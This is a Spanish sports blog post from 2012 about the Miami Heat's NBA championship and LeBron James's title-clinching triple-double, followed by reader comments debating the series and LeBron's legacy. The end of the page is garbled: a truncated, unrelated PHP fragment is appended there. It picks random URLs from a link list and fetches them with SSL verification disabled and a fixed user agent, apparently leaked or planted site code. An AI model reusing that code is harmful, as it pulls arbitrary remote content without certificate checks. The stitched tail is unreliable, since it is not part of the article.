La Crónica: The Magic King

22 de June de 2012 por txusma

“Happiest day of my life. This is a dream come true for me. This is definitely when it pays off.” Lebron James.

Liberémonos de todo prejuicio. Intentemos disfrutar en todo su esplendor de la grandeza con la que LeBron ha alcanzado su sueño.

El triple doble de anoche, los 60 puntos generados a partir de su figura, es la guinda a una campaña inmejorable a la altura de las mayores hazañas que hayamos presenciado. La duda que queda es cuánto se alargará su leyenda. Él ya se sienta entre los mitos. Sorprende e inspira la manera con la que se levantó de los batacazos recientes.

Sólo 4 hombres antes en este mundo habían firmado el triple doble en un duelo para cerrar el anillo. Lo lograron, cómo no, Magic en 2 ocasiones (1982, 1985), Bird (1986) y Worthy (1988). Sólo Duncan lo ha conseguido en el nuevo siglo (2003).

A partir de la antológica producción de James todo sopló de cara para los Heat anoche. Impecables Wade y Bosh para completar el tridente, notables Battier y Chalmers como lo han estado toda la serie, increíble Mike Miller con un 7 de 8 en triples que terminó de aniquilar la escasa resistencia que le quedaba al rival. Como nota simpática añadimos que un crack como Juwan Howard consigue el anillo.

Los Thunder se vieron impotentes para parar el vendaval. Como es lógico, no quedaba la misma fe e intensidad que en los primeros choques y en el tramo final del tercer cuarto ya estaban totalmente entregados. Durant aguantó el tipo y mejoró Harden, pero claudicó Westbrook con 4 canastas anotadas de 20 intentos. Del resto el único reconocible fue Derek Fisher, eterno.

Harán bien tomando nota de cómo afrontó su particular crisis Miami, porque este duelo se puede convertir perfectamente en un clásico el próximo lustro.

PREMIOS

MVP: La reencarnación de Magic o la versión “Robocop” del genial base amarillo. LeBron James ha sido el MVP de todo este año. Un 26-11-13 increíble, 60 puntos generados. Una actuación para recordar toda la vida.

Sorpresa: Habría que analizar nuestra capacidad para motivar al personal. Le hemos dicho de todo menos bonico a Mike “acabado” Miller. Anoche seguramente nos habría dedicado sus 23 puntos y 5 rebotes con 7 de 8 en triples.

Decepción: Después de hacer el partido y los playoffs de su vida, es un lástima terminar firmando un 4 de 20 en tiro, recordándonos a algunos porqué no nos termina de convencer Russell Westbrook.

Esfuezo en vano: Del partido y de la serie. Kevin Durant ha sido digno rival para un LeBron supremo. Por muchos años.


Imágenes | AP Photos / Getty Images


Comenta

24 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Se acabó la temporada. Tras unas Finales de Conferencia fenomenales estas Finales nos dejan un poso de lo que pudo ser unas series de leyenda y se quedan un poco por debajo de lo esperado.
    Sin duda es la temporada de la coronación de LeBron James como el Rey de la actual NBA. En su 9ª temporada tras gran cantidad de fracasos y frustraciones personales al fin ha llegado su momento, el momento al que parecía destinado desde que llegó a la liga. Ha sido mejor que sea así, como debe ser, con sufrimiento y tras aprender que hay que respetar a rivales y compañeros para conseguirlo. Creo que para él ha debido ser un viaje increíble y que ha ido aprendiendo de los muchos errores que iba cometiendo en el camino.
    Hoy poca crónica del partido hay que hacer. Basta resumirlo cómo que la defensa de los Thunder ha terminado por hundirse conforme pasaban los partidos, incapaces de cerrar su aro ni de salir a los tiros han acabado totalmente desconcertados y los Heat simplemente les han pasado por encima en ataque. Desde luego a toro pasado es fácil decir que la Final les ha llegado pronto. No es fácil jugar unas Finales por primera vez y jugadores como Westbrook y Harden se han visto muchas veces sobrepasados por el momento (Harden siempre, Westbrook alternando momentos muy brillantes con otros de absoluto caos). Sin embargo, creo que están en el camino. Ganar la NBA no es fácil y ellos son muy jóvenes y seguro que aprenderán de los errores. Les queda la tarea de mejorar defensivamente como equipo y de intentar que su ataque no sea una sucesión de 1×1 confiando en el talento de sus mejores jugadores. Aprenderán y pueden ser el equipo de unos próximos años que pueden vivir varias finales Heat-Thunder si esto no cambia.
    Por Miami al fin se ha visto en estas Finales el verdadero potencial ofensivo de este equipo que aprovechando la fuerza de LeBron ha sacado ventajas en cada jugada para anotar o doblar balones a sus tiradores que han estado inmensos, mención especial para ese muerto físicamente Mike Miller que ha clavado 7 triples en este último partido y para Battier y Chalmers el resto de las series. Tampoco el pick&roll Wade-Bosh han sabido leer unos Thunder que han dejado de creer en su defensa y por ahí se les han ido las finales. Sólo Durant pareció con determinación real para luchar (32 puntos, 11 rebotes) el resto de sus compañeros bajaron los brazos. Han sido dos años en los que Miami parecía jugar peor de lo que podía llegar a hacer con muchos colapsos ofensivos hasta llegar a estas Finales repletas de buen juego por su parte.
    LeBron, gran MVP de las Finales y los PO termina su temporada coronado por unas actuaciones bestiales en estas series y en todos los PO, acabando con un triple-doble de leyenda el día de su coronación definitiva pero esta vez los Heat lo hicieron a partir de él como un verdadero equipo. Wade y Bosh maltrataron a los Thunder con sus pick&rolls y su intensidad y la batería de secundarios fue de lujo con Miller destapándose, Chalmers muy bien, Battier aportando mucho, todo un equipo completo que ha ido resolviendo sus propias dudas para darse cuenta durante la final de que si juegan pasándose la bola y no dejándolo todo en manos de LeBron&Wade pueden ser realmente imparables. Ese ha sido el gran descubrimiento de estas Finales, el hecho de que los Heat hayan jugado realmente en equipo, involucrando a muchos jugadores en ataque y compartiendo el balón. Felicitaciones merecidas por ello y jugando así sin duda podrían estar en el camino de más títulos, veremos que nos traen las próximas temporadas.
    P.D. Estas Finales dejan en todavía mejor lugar a mis admirados verdes ya que Boston ha sido el equipo que verdaderamente ha puesto a los Heat al borde de la eliminación. Honor para ellos de nuevo desde aquí

      Citar

  2. txusma dice:
    #2

    Empezando la final deseando que ganaran los Heat para que Lebron tuviera su anillo y aquí lo tenemos. Lebron ha roto muchos prejuicios y espero q ahora ya se le valore realmente como se lo merece. Es ya, sin dudarlo, uno de los mejores 50 jugadores de la historia de la NBA y veremos hasta donde puede llegar.
    Y Dwyane Wade, 2 anillos, que no se nos olvide.

      Citar

  3. Viva_Dirk dice:
    #3

    Si la verdad es que aunque me gustaba mas la opción Thunder a mi también me alegra que Lebron logre su primer anillo, además con unos de los mejores play-offs globales de la historia de liga.

    Entre los 50 ya esta sin duda, ahora hay que esperar a ver hasta donde llega su leyenda.

      Citar

  4. Sancho88 dice:
    #4

    Yo me alegro por Mike Miller y Shane Battier, dos currantes desde siempre en la NBA que han tenido que adaptar su juego para ser jugadores de rol pero a cambio han conseguido lo que llevaban peleando más de 10 años. Lebron ya es inmortal. Hoy es el día perfecto para volver a ver el documental de su etapa en high school. Hoy me acuerdo de aquellas primeras noticias sobre Lebron: Nike blinda a un joven de 15 años que va a hacer maravillas en la NBA. Todos estábamos incrédulos. Quién sería aquel chico? Pues nada menos que la apisonadora que va batiendo todos los records, que está haciendo gestas que hacía décadas nadie hacía y que tiene por lo menos otros 5 años para seguir jugando a primer nivel y dominar este deporte. Detrás vienen muchos y buenos, pero este señor es sublime. Hoy se rompen las maldiciones, hoy comienza realmente la guerra. Ahora Durant tiene un anillo menos que Lebron. Hasta 2020 más o menos tendrán tiempo y finales para volverse a encontrar. Quién no aventura la misma final para el año que viene?

      Citar

  5. portu dice:
    #5

    Felicidades a Miami y a Lebron, el mejor jugador desde MJ.

      Citar

  6. simon dice:
    #6

    Yo queria que ganara OKC pues de siempre me han caido mejor sobre todo Durant, pero he de reconocer que este anillo es merecidisimo para Lebron… A mitad de temporada hablabamos que ya habia pagado bastante por The Decision y me alegro mucho por este autentico mounstruo y ahora lanzo una profecia: Despojado ya de las cadenas que lo atenazaban ( falta de anillo, jugador poco resolutivo en los momentos importantes etc… ) ahora vamos a ver al Lebron mas desatado y dominador de siempre. He dicho.

      Citar

  7. GreenPride dice:
    #7

    Estoy de acuerdo con las opiniones generales. Este anillo debe ser una liberación para LeBron y a partir de ahora y con la madurez de su juego ya alcanzada ((todavía podría mejorar más el tiro incluso) deberían verse sus mejores temporadas lo cual ya es mucho decir y sobre todo sus mejores años en PO ya con algo menos de presión. En la NBA siempre puede haber sorpresas pero así a bote pronto y si las renovaciones no lo impiden se avecinan unos años de duelos LeBron-Durant, Heat-Thunder por el dominio de esta década en la NBA. Puede llegar a ser otra rivalidad histórica pues Durant puede amenazar el lugar de LeBron en la historia. Merecidísimo anillo para Miami y LeBron al que creo que le está empezando a llegar el reconocimiento que este año sí se ha ganado. Las puertas del olimpo baloncestístico se han abierto para él, veremos en qué lugar se ubica en él durante los próximos años.

      Citar

  8. German dice:
    #8

    Que decir, no aprecio ni un poco a James pero no queda mas que rendirse ante las evidencias, excelentes playoffs y unas finales para el recuerdo, mas que merecido anillo.
    Para destacar tambien lo de Battier, muy pegajoso en defensa y aportando invalorables triples a lo largo de toda la serie. Al principio de temporada coincidiamos con varios de aqui lo importante q iba a ser Battier en Miami y lo mucho que lo iban a extrañar en Memphis a pesar del regreso de Gay… nos dio la razon.

    Con respecto a Oklahoma, muy bien Durant como siempre y, salvo ayer, muy buenas finales de Westbrook, que deberia seguir este camino y seguir ajustando su cabeza algo mas. Decepcionante lo de Harden y tambien los internos, deben buscar uno con anotacion urgente para terminar de coronar este gran equipo que tienen.

      Citar

  9. Esteban dice:
    #9

    creo que eran dos equipos demasiado desiguales en cuanto a la platinlla

    lo dije antes de la serie, quien defenderia a lebron? y si lo ponian de 4?

    PRIMERO CUESTION el thunder no tiene un hombre con la minima envergadura para hacerle cosquillas a lebron, sefolosha es demasiado liviano, me hace acordar a los intentos de prince en detroit viendo como lebron le metia los ultimos 29 opuntos de su equipp, simplemente no tiene fuerza para marcarlo, si la tiene harden pero no tiene los centimetros, y si la fuerza y los centimetros si los tiene collison e ibaka pero no la agilidad, a los thunder les hubiese caido como anillo al dedo (y se lo hubieran colocado) teniendo a un artest, stevenson, marion, pietrus etc, aunque no sirvan para muicho, lebron no puede abusar de ellos en el poste, ni pasarlos por arriba en velocidad,
    antes de la final plantie esta cuestion y me dijieron, que no seria tan complicado, pues creo que, nunca se le encontro la vuelta a esa marca

    SEGUNDA CUESTION, los internos del thunder no estaban hechos para esta serie, son exelente defensores pero MALOS jugadores ofensivos, SANCHO88 me dijo que no tenia ni idea al decir que ibaka y perkis no podian anotar, que no habia aprendido nada de la serie con los spurs, bueno, creo que el fue quien no aprendio nada, perkis es un epecialista dfensiendo a centro al poste, pero el het no posteo a nadie, y en atauqe hizo todo mal, ibaka de por si es mejor que perkis, pero no es un talento ofensivo capaz que abusar de los internos del heat como hicieron en series anteriores WSET y GARNETT, sin duda el thunder armo ese juego interno para pelear en defensa con pivots como howard, bynum, gasol, o el que sea, pero para marcar enanos, que incluso hasta pudieron defenderlos

      Citar

  10. Esteban dice:
    #10

    LeBron James, algunos dicen que no importa si uno gana o no un campeonato, quiza en la NBA se le da demasiado valor a ganar un titulo, pero para los grandes no es una detalle menor,

    es la forma de ganarlo, por que dexter pittman podra presumir que tiene un anillo, pero lo de james es diferente

    dirk fue criticado por frio toda su carrera, pero el nivel mostrado el año pasado borro esas criticas y lo pone casi como el mejor extranjero de la huistoria sin discusion, ademas de meterlo en la lucha pòr el mejor 4 de la historia,
    james a jugaod unos PO increibles, su dominio en estas finales hacen recordar a shaq como alguna vez dije, es decxir promedio 30 puntos, pero dio la impresion de que podia irse hasta 40 si lo queria, pero en lugar de eso se lleno de asistencias

    cuando se gana un titulo que te faltaba jugando al niveld e dirk y de james, la historia cambia, este heat encuentra en chalmers un base suficientemente bueno para ganar ujn titulo, un bosh reconvertido en pivot, supliendo otra debilidad del equipo (solo podria sufrir como pivot frente a un hoiward o bynum, pero son solos dos jugadores), se le aplicara la anmistia a miller por lo que tendran una excepcion de nivel medio, mas un batallon de veteranos que querran jugar alli por el anillo (jason terry ya lo manifesto)

    el heat tiene todo para hacer epoca, ganarse 2 anillos mas al menos, y estar en las proximas 4 finales, lo que haria un total de 6 seguida, y lo podrian a la altura de los mejores equipos e la historia

    y lebron… bueno ahora decididamente entra a la carrera del mejor 3 de la historia, y bird ruega por una lesion de THE KING, sino habra un nuevo reinado

      Citar

  11. Sancho88 dice:
    #11

    no entraré en debates foreros marqueros contigo Esteban. Te doy la razón y en paz. Yo solo analizo por lo que veo, no juego a ser dios prediciendo, y lo que vi en esa serie me hizo darle importancia ofensiva a los pívots de Oklahoma. No me gusta tu oportunismo barato, pero hasta aquí, no voy a añadir ni una coma a tu discurso porque ya me lo conozco, y reitero que me da asco entrar en estas descalificaciones personales porque le quita nivel a este gran foro

      Citar

  12. Esteban dice:
    #12

    Sancho88:
    no entraré en debates foreros marqueros contigo Esteban. Te doy la razón y en paz. Yo solo analizo por lo que veo, no juego a ser dios prediciendo, y lo que vi en esa serie me hizo darle importancia ofensiva a los pívots de Oklahoma. No me gusta tu oportunismo barato, pero hasta aquí, no voy a añadir ni una coma a tu discurso porque ya me lo conozco, y reitero que me da asco entrar en estas descalificaciones personales porque le quita nivel a este gran foro

    bueno recuerdo que fuiste tu quien dijo que yo no entendia nada de nada y que habia estado ciego en la serie frente a los spurs, que hablaba de estadisticas y no se que mas, pues bueno, solo recorde aquello, el post sige vivo, asi que busque el comentario:

    Citar
    Esteban dice: 10.06.12 a las 18:37
    #3

    Si el heat pone una formacion con james de 4? Como soluciona eso OCT?

    Citar
    Heineken dice: 10.06.12 a las 20:13
    #4

    Esteban:
    Si el heat pone una formacion con james de 4? Como soluciona eso OCT?

    Jugando con Westbrook-Harden-Durant-Sefo-Ibaka/Perkins

    Sefolosha sobre LeBron

    Citar
    Citar
    Esteban dice: 11.06.12 a las 1:38
    #7

    Heineken: Jugando con Westbrook-Harden-Durant-Sefo-Ibaka/Perkins

    Sefolosha sobre LeBron

    dudo de la fuerza de sefolosha si lebron lo lleva bajo el aro, y en defensa miami no perderia demasiado ya que los internos del thunder no son precisamente buenos anotadores

    Sancho88 dice: 11.06.12 a las 2:31
    #8

    Bueno, si dices eso acerca de los internos de los Thunder, entonces demuestras que has estado totalmente desconectado las dos últimas semanas. Resulta muy fácil hablar de manera estadística como haces tú, o con determinados clichés acerca de muchos jugadores que después se desmontan como castillos en el aire. Si dices que los interiores de Oklahoma no son buenos anotadores, entonces, qué lección has aprendido tú de la serie contra San Antonio? Ninguna, por lo que veo

    pues quien se enerva primero POR NADA y falta el respeto a quien??????????????????????

      Citar

  13. Sancho88 dice:
    #13

    repito, esto es blogtjnba. no diré nada más

      Citar

  14. melo15 dice:
    #14

    Esteban, no hace falta poner en evidencia a Sancho, el se equivoco y la serie contra Spurs le hizo suponer que los pivots de OCK tendrian mas protagonismo pero no ha sido asi. Todos nos podemos equivocar y dejarnos llevar un poco por las sensaciones de los ultimos partidos, pero me parece feo que le recrimines cuando TODOS al largo del año nos hemos equivocado en nuestra predicciones

      Citar

  15. Txusma dice:
    #15

    portu:
    Felicidades a Miami y a Lebron, el mejor jugador desde MJ.

    Entro al trapo? No entro al trapo? Venga va, entro.

    Estando Tim Duncan, Kobe Bryant y, pq no, Kevin Garnett, esa aseveración es como mínimo discutible. Eso sí, 2 anillos más a este nivel y me trago lo que acabo de decir.

      Citar

  16. Esteban dice:
    #16

    melo15:
    Esteban, no hace falta poner en evidencia a Sancho, el se equivoco y la serie contra Spurs le hizo suponer que los pivots de OCK tendrian mas protagonismo pero no ha sido asi. Todos nos podemos equivocar y dejarnos llevar un poco por las sensaciones de los ultimos partidos, pero me parece feo que le recrimines cuando TODOS al largo del año nos hemos equivocado en nuestra predicciones

    seguro, yo me he equivocado mas que cualquiera, solo que me parecio exagerada la respuesta en aquel momento de sancho, no tengo nada en contra de el, incluso me cae bien, pero me guarde ese recuerdo por como me respondio

      Citar

  17. nach dice:
    #17

    Txusma: Entro al trapo? No entro al trapo? Venga va, entro.

    Estando Tim Duncan, Kobe Bryant y, pq no, Kevin Garnett, esa aseveración es como mínimo discutible. Eso sí, 2 anillos más a este nivel y me trago lo que acabo de decir.

    Por potencial para mí es lo mejor que ha pasado desde MJ por la NBA, pero le faltan muchas cosas, cosas que está a tiempo de mejorar y de conseguir para hacerse con un lugar entre los más grandes.

    Tiene potencial y sobre todo cualidades físicas para ser un TOP20 histórico, pero le faltan muchas otras cosas, empezando por el carisma.

      Citar

  18. Esteban dice:
    #18

    Txusma: Entro al trapo? No entro al trapo? Venga va, entro.

    Estando Tim Duncan, Kobe Bryant y, pq no, Kevin Garnett, esa aseveración es como mínimo discutible. Eso sí, 2 anillos más a este nivel y me trago lo que acabo de decir.

    exacto! hoy lebron sigue algo detras de shaq, duncan y kobe, pero habra que ver cuantos titulos y cuantos MVPS mas pude lograr lebron

    igual ya lo dije el otro dia, por su juego tan tan fisico, no veo a lebron jugar a este nivel por ensima de los 31 años, si puede mantener este nivel hasta los 35, habra dudas incluso si es mejor que jordan

    a este ritmo, acumulara 5 MVP de temporada regular, esta en camino e pasar a kobe entre maximos anotadores, y podia alcanzar 3 MVP de finales

    habra que evaluar cuando acabe su carrera

      Citar

  19. Nacho dice:
    #19

    @mí, que fui el primero en poner a LeBron como fracaso. Ya anunciaba por aquel entonces que seguro me callaba la boca, lo ha hecho. Pero para mí lo importante de Miami en estas series no ha sido lo imperial que se ha mostrado James, sino el asombroso juego en equipo que han demostrado, las variantes ofensivas, y el que hasta 9 jugadores hayan estado enchufados por diversos momentos. Tras los palos recibidos (también por parte mía) creo que hay que darle mérito a Spoelstra. Han jugado muy bien.

    @Esteban. y el rollo de los internos de OKC. Los pivots, para poder anotar necesitan que la bola circule. Si ésta no lo hace, el problema anotador deja de ser suyo. Creo que el problema de los Thunder es que no mueven la bola. A veces les basta. Muchas veces. Pero cuando alguno de sus anotadores por cuenta propia se atasca, y el factor Harden ha sido fundamental en estas finales, solo el movimiento de balón puede ser la solución. Un Westbrook como el del cuarto partido no se ve todos los días. Un Durant sí, pero cuando tiene que estar rogando a su base que se la pase… algo falla.

    @blogtjnba. Gracias una vez más por existir. He pasado unas finales chungas, currando mogollón, y he podido ver los partidos algunas mañanas tempranito solo viendo el juego real. Me molan los comentarios de Daimiel, pero los he tenido que obviar por cuestiones de tiempo. Pero a lo largo del día, en cualquier hueco, he podido ir siguiéndoos y aprendiendo de vosotros. Más cuando no coincidimos. He esperado para agachar la cabeza por LeBron y lo que he comentado aquí, y discutido con Txusma, por esa falta de tiempo, y porque esperaba que sucediese lo que ha pasado. Eso sí, me sigue cayendo mal (LeBron, no Txusma, jeje) Pero he visto un cambio brutal en él desde el 5º de la serie contra Boston. Ahí empezó a ganar el anillo, y creo que es ahí donde se dio cuenta de que necesitaba a todo el equipo, no solo a Wade. Curiosamente cuando más palos le di. Será que os lee…
    Un abrazo a todos, y aunque seguiremos compartiendo estos momentos estos días, próspero descanso y feliz nueva temporada…

      Citar

  20. Esteban dice:
    #20

    nacho aunque la bola circule e ibaka o perkis puedan meter un par de volcadas, son jugadores malos verdaderamente jugando aclarados la poste, donde como dije antes, tanto david west como garnett se hiceron un festin en las series frente al heat

    el heat tiene un deficit de potencia defensiva bajo los aros, a tal puinto que ESPN ponia 8vo MVP de los po hasta el momento a west, y el thunder no pudo abusarse de eso

    la prueba esta en los mminutos jugados por anthony, turiaf y pittman, que durante las series frente a pacers y celtics, alternaron como titulares y se llenaron de minutos, sin duda spolstra vio que no era necesario tener un interno de corte netamente defensivo en toda la serie

      Citar

  21. Ru dice:
    #21

    Hay un jugador que no ha tenido su reconocimiento,Eddy Curry.Si una mariposa que bate sus alas en San Francisco es la causa de un tifón en Japón,no me creo yo que la bajada de peso de Curry no tenga nada ver con el anillo….

    Fuera coñas,vaya alegría me he llevado con el triunfo de Miami,si me he emocionado y todo.La verdad es que uno es fan de LeBron (me he dado cuenta que muy fan aunque intento ser lo más objetivo posible) y viendo como le atizaban se ve que lo he interpretado todas esas veces como si atacan a alguien de mi entorno.Algunas veces con razón,otras muchas yo creo que llega a lo irracional pero bueno,están ahí y los números son los que son,de una auténtica figura de la NBA,no sólo actual si no historicamente.Creo que lo odies o lo admires se tiene que ver.Y como dije hace unos días con el 3-1,se ha juntado la mejor química de equipo con el LeBron más maduro.Como dice Nacho,Spoelstra muy bien,él tampoco lo ha tenido fácil al lidiar a semejantes miuras de jugadores.Pero no sólo ellos dos,todo el equipo ha estado perfecto,Bosh como jugador a la sombra,Battier incomensurable,mi criticado Wade perfecto escudero…todos,hasta hoy el ex jugador,”The Pain” Miller,”Walking Miller”…ha estado pletórico.

    Por los Thunder hoy han salido entregados sabiendo el final que iba a tener esta historia.Fundamental mantener el bloque aunque haya jugadores que salgan tocados.Desde luego los rumores de que Scott Brooks pide 4 años y OKC sólo le dan 2 tampoco favorecen pero supongo que seguirán juntos.Antes de la final los veía favoritos para ganar el campeonato y decía que LeBron estaba ante su última oportunidad antes de que se abriera la era de los Thunder.A día de hoy sigo viéndolos fortísimos pero quizás el juego de equipo de los Heat,si lo mantienen así,puedan abrir una época histórica en la NBA.

      Citar

  22. Ru dice:
    #22

    Por cierto,aún queda el draft y miles de rumores que saldrán estos días.Personalmente creo que veremos traspasos la noche del draft y alguno movido,veremos…

      Citar

  23. nba dice:
    #23

    En cierta medida creo que la temporada que viene va a ser si cabe mas interesante,
    veremos si los lesionados Ricky-Rose , vuelven al nivel esperado ,
    veremos la decadencia de los 4 grandes de la ultima decada Kobe-Duncan-Garnett-Dirk , o todavia tendran tiempo de ganar un anillo.
    este draft alumbrara alguna estrella capaz de eclipsar en años venideros el legado de los 4 grandes nombrados anteriormente ??
    y sobre todo, disfrutaremos de una liga regular mas interesante al no ser tan comprimidos los partidos .
    Lo que ya no queda dudas es, que ahora ya se puede decir de verdad lo de …
    Lebron James , Año 1…

      Citar

  24. M dice:
    #24

    LeBron no es el más simpático, pero es el mejor ahora. Y le faltaba esto para que fuera indiscutible. Durant no está lejos, pero parece que su equipo no juega a partir de él, como hace LeBron (uno de los jugadores más generosos con sus compañeros que he visto, aprovecha las ayudas para dejarlos infinidad de veces solos y con tiros muy asequibles, aunque muchas veces fallen, los mataos ;P). Westbrook…para hacérselo mirar. Si no respetas las jerarquías de tu equipo, acabas cortocircuitándolo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>